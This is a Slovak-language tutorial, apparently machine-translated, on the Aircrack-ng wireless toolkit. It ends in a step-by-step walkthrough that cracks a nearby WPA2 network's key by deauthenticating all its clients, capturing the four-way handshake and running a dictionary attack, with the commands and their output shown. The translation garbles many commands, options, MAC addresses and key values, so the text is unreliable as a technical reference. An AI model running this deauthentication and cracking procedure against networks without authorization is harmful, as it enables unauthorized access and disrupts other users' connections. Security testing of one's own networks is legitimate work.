Ako používať Aircrack-ng

How Use Aircrack Ng



Ľudia väčšinou nikdy neuvažujú o sieti, ku ktorej sú pripojení. Nikdy si nemyslia, ako bezpečná je táto sieť a ako veľmi denne riskujú svoje dôverné údaje. Kontrolu zraniteľnosti môžete vo svojich sieťach WiFi vykonávať pomocou veľmi výkonného nástroja s názvom Aircrack-ng a Wireshark. Wireshark sa používa na monitorovanie sieťovej aktivity. Aircrack-ng je skôr agresívny nástroj, ktorý vám umožní hacknúť a poskytnúť prístup k bezdrôtovým pripojeniam. Myslenie ako votrelec bolo vždy najbezpečnejším spôsobom, ako sa chrániť pred hackermi. Naučte sa o aircrack a môžete presne pochopiť, aké kroky podnikne votrelec, aby získal prístup do vášho systému. Potom môžete vo svojom vlastnom systéme vykonávať kontroly zhody, aby ste sa presvedčili, že nie je neistý.

Aircrack-ng je úplná sada softvéru navrhnutého na testovanie zabezpečenia siete WiFi. Nie je to len jeden nástroj, ale súbor nástrojov, z ktorých každý plní konkrétny účel. Je možné pracovať na rôznych oblastiach zabezpečenia wifi, ako je monitorovanie prístupového bodu, testovanie, útoky na sieť, prelomenie siete Wi -Fi a testovanie. Hlavným cieľom spoločnosti Aircrack je zachytiť pakety a dešifrovať hash, aby sa prelomili heslá. Podporuje takmer všetky nové bezdrôtové rozhrania. Aircrack-ng je vylepšenou verziou zastaranej sady nástrojov Aircrack, ktorá odkazuje na Nová generácia . Niektoré z úžasných nástrojov, ktoré spolupracujú pri zvládaní väčšej úlohy.







Airmon:

Airmon-ng je súčasťou súpravy aircrack-ng, ktorá prepína kartu sieťového rozhrania do režimu monitora. Sieťové karty zvyčajne prijímajú iba pakety, ktoré sú na ne určené, ako sú definované v MAC adrese NIC, ale s airmon-ng budú akceptované aj všetky bezdrôtové pakety, či už sú na ne zamerané alebo nie. Tieto pakety by ste mali byť schopní zachytiť bez prepojenia alebo autentifikácie s prístupovým bodom. Slúži na kontrolu stavu prístupového bodu prepnutím sieťového rozhrania do režimu monitora. Najprv je potrebné nakonfigurovať bezdrôtové karty tak, aby zapli režim monitora, a potom zabiť všetky procesy na pozadí, ak si myslíte, že mu nejaký proces prekáža. Po ukončení procesov je možné režim monitora povoliť na bezdrôtovom rozhraní spustením nasledujúceho príkazu:



[chránené e -mailom]: ~ $sudoairmon-ng start wlan0#

Režim monitora môžete vypnúť aj zastavením monitorovania kedykoľvek pomocou nasledujúceho príkazu:

[chránené e -mailom]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng sa používa na zoznam všetkých sietí, ktoré nás obklopujú, a na zobrazenie cenných informácií o nich. Základnou funkčnosťou airodump-ng je čuchať pakety, takže je v podstate naprogramovaný tak, aby zachytil všetky pakety okolo nás a bol zaradený do režimu monitora. Spustíme ho proti všetkým pripojeniam okolo nás a zhromaždíme údaje, ako je počet klientov pripojených k sieti, ich zodpovedajúce adresy MAC, štýl šifrovania a názvy kanálov, a potom začneme zacieľovať na našu cieľovú sieť.

Tento nástroj môžeme aktivovať zadaním príkazu airodump-ng a zadaním parametra názvu sieťového rozhrania. Zobrazí zoznam všetkých prístupových bodov, množstvo použitých dátových paketov, metódy šifrovania a autentifikácie a názov siete (ESSID). Z hľadiska hackovania sú najdôležitejšími poliami adresy MAC.

[chránené e -mailom]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack slúži na prelomenie hesla. Po zachytení všetkých paketov pomocou airodumpu môžeme kľúč prelomiť pomocou aircrack. Tieto kľúče prelomí pomocou dvoch metód PTW a FMS. Prístup PTW sa vykonáva v dvoch fázach. Najprv sa používajú iba pakety ARP a až potom, ak kľúč po vyhľadaní nie je prelomený, použije všetky ostatné zachytené pakety. Plusovým bodom prístupu PTW je, že nie všetky pakety sú použité na praskanie. V druhom prístupe, tj. FMS, používame na prelomenie kľúča tak štatistické modely, ako aj algá hrubej sily. Možno použiť aj slovníkovú metódu.

Aireplay:

Airplay-ng uvádza pakety do bezdrôtovej siete na vytváranie alebo zrýchlenie prenosu. Pakety z dvoch rôznych zdrojov je možné zachytiť pomocou aireplay-ng. Prvým je živá sieť a druhým sú pakety z už existujúceho súboru pcap. Airplay-ng je užitočný počas útoku na autorizáciu, ktorý sa zameriava na bezdrôtový prístupový bod a používateľa. Okrem toho môžete vykonať niekoľko útokov, ako je napríklad útok latte na kávu, pomocou airplay-ng, nástroja, ktorý vám umožní získať kľúč zo systému klienta. Môžete to dosiahnuť chytením paketu ARP a následnou manipuláciou a odoslaním späť do systému. Klient potom vytvorí paket, ktorý je možné zachytiť pomocou airodumpu a aircrack rozbije kľúč z tohto upraveného paketu. Niektoré ďalšie možnosti útoku na airplay-ng zahŕňajú chopchop, prehrávanie fragmentov atď.

Letecká základňa:

Airbase-ng sa používa na transformáciu počítača narušiteľa na ohrozený bod pripojenia, na ktorý sa môžu pripojiť ostatní. Pomocou Airbase-ng môžete o sebe tvrdiť, že ste legálnym prístupovým bodom, a vykonávať útoky typu man-in-the-middle na počítače, ktoré sú pripojené k vašej sieti. Tieto druhy útokov sa nazývajú Evil Twin Attacks. Pre základných používateľov je nemožné rozlíšiť medzi legálnym prístupovým bodom a falošným prístupovým bodom. Hrozba zlého dvojčaťa je teda jednou z najohrozenejších bezdrôtových hrozieb, s ktorými sa dnes stretávame.

Airolib-ng:

Airolib urýchľuje proces hackovania ukladaním a správou zoznamov hesiel a prístupového bodu. Systém správy databáz, ktorý používa tento program, je SQLite3, ktorý je väčšinou k dispozícii na všetkých platformách. Prelomenie hesla zahŕňa výpočet párového hlavného kľúča, pomocou ktorého sa extrahuje súkromný prechodný kľúč (PTK). Pomocou PTK môžete určiť identifikačný kód rámcovej správy (MIC) pre daný paket a teoreticky zistiť, že MIC je podobný paketu, takže ak mal PTK pravdu, mal pravdu aj PMK.

Ak chcete zobraziť zoznamy hesiel a prístupové siete uložené v databáze, zadajte nasledujúci príkaz:

[chránené e -mailom]: ~ $sudoairolib-ng testovacia databáza-štatistiky

Tu testdatabase je db, ku ktorému chcete získať prístup alebo vytvoriť, a –stats je operácia, ktorú na ňom chcete vykonať. V databázových poliach môžete vykonávať viacero operácií, napríklad priraďte maximálnu prioritu nejakému SSID alebo niečomu podobnému. Ak chcete použiť airolib-ng s aircrack-ng, zadajte nasledujúci príkaz:

[chránené e -mailom]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Tu používame už vypočítané PMK uložené v testovaciu databázu na urýchlenie procesu prelomenia hesla.

Prelomenie WPA/WPA2 pomocou Aircrack-ng:

Pozrime sa na malý príklad toho, čo môže aircrack-ng urobiť pomocou niekoľkých jeho úžasných nástrojov. Rozbijeme vopred zdieľaný kľúč siete WPA/WPA2 pomocou slovníkovej metódy.

Prvá vec, ktorú musíme urobiť, je vypísať zoznam sieťových rozhraní, ktoré podporujú režim monitorovania. To je možné vykonať pomocou nasledujúceho príkazu:

[chránené e -mailom]: ~ $sudoairmon-ng

Čipová sada ovládača rozhrania PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Môžeme vidieť rozhranie; teraz musíme prepnúť nájdené sieťové rozhranie (wlx0) do režimu monitora pomocou nasledujúceho príkazu:

[chránené e -mailom]: ~ $sudoairmon-ng start wlx0

Umožnil režim monitora na rozhraní s názvom wlx0mon .

Teraz by sme mali začať počúvať vysielanie blízkych smerovačov prostredníctvom nášho sieťového rozhrania, ktoré sme uviedli do režimu monitora.

[chránené e -mailom]: ~ $sudoairodump-ng wlx0mon

CH5 ][Uplynulý:30s][ 2020-12-02 00:17



Majáky BSSID PWR#Data, #/s CH MB ŠÍPKA ENC AUTH ESSID



E4: 6F:13: 04: CE:31 -Štyri päť 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10: BUĎ-63 77 0 0 654e. Hackme WPA2 CCMP PSK

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: DÁVA:88: FA:38: 02-68 28 2 0 jedenásť54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Sonda stratených snímok



E4: 6F:13: 04: CE:315C: 3A:Štyri, päť: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13

Našou cieľovou sieťou je Crackit v tomto prípade aktuálne beží na kanáli 1.

Aby sme prelomili heslo cieľovej siete, musíme zachytiť 4-smerné podanie ruky, ku ktorému dôjde, keď sa zariadenie pokúsi pripojiť k sieti. Môžeme to zachytiť pomocou nasledujúceho príkazu:

[chránené e -mailom]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -v /domáci wlx0

-c : Kanál

–Bss : Bssid cieľovej siete

-v : Názov adresára, do ktorého bude umiestnený súbor pcap

Teraz musíme počkať, kým sa zariadenie pripojí k sieti, ale existuje lepší spôsob, ako zachytiť podanie ruky. Môžeme zrušiť autorizáciu zariadení na AP pomocou deautentizačného útoku pomocou nasledujúceho príkazu:

[chránené e -mailom]: ~ $sudoaireplay-ng-0 -doE4: 6F:13: 04: CE:31

do : Bssid cieľovej siete

-0 : deautentizačný útok

Odpojili sme všetky zariadenia a teraz musíme počkať, kým sa zariadenie pripojí k sieti.

CH1 ][Uplynulý:30s][ 2020-12-02 00:02][Podanie ruky WPA: E4: 6F:13: 04: CE:31



Majáky BSSID PWR RXQ#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



BSSID STATION PWR Sonda stratených snímok



E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Štyri, päť: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Dostali sme zásah a pri pohľade do pravého horného rohu hneď vedľa času vidíme, že bolo zachytené podanie ruky. Teraz sa pozrite do zadaného priečinka ( /Domov v našom prípade) za a .pcap súbor.

Na prelomenie kľúča WPA môžeme použiť nasledujúci príkaz:

[chránené e -mailom]: ~ $sudoaircrack-ng-a2 -vrockyou.txt-bE4: 6F:13: 04: CE:31handshake.cap

b: Bssid cieľovej siete

-a2: režim WPA2

Rockyou.txt: Slovníksúborpoužité

Handshake.cap:súbor ktoréobsahuje zachytené podanie ruky

Aircrack-ng1.2beta3

[00:01:49] 10566kľúče testované(1017,96k/s)

KĽÚČOVÉ ZISTENÉ! [dostal si ma]

Hlavný kľúč: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpäťdesiatC.


Prechodný kľúč: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FpäťdesiatC025 62E9 5D71

Kľúč k našej cieľovej sieti bol úspešne prelomený.

Záver:

Bezdrôtové siete sú všade, používa ich každá spoločnosť, od pracovníkov používajúcich smartfóny až po priemyselné riadiace zariadenia. Podľa výskumu bude v roku 2021 takmer 50 percent internetového prenosu cez WiFi. Bezdrôtové siete majú mnoho výhod, komunikácia za dverami, rýchly prístup na internet v miestach, kde je takmer nemožné položiť vodiče, môžu rozšíriť sieť bez inštalácie káblov pre akéhokoľvek iného používateľa a môže ľahko pripojiť vaše mobilné zariadenia k vašim domácim kanceláriám, pokiaľ tam nie ste.

Napriek týmto výhodám existuje veľký otáznik o vašom súkromí a zabezpečení. Ako tieto siete; smerovače v prenosovom dosahu sú prístupné každému, je možné na ne ľahko zaútočiť a vaše údaje môžu byť ohrozené. Napríklad, ak ste pripojení k nejakému verejnému wifi, ktokoľvek pripojený k tejto sieti môže ľahko kontrolovať váš sieťový prenos pomocou určitej inteligencie a pomocou úžasných dostupných nástrojov a dokonca ho vyprázdniť.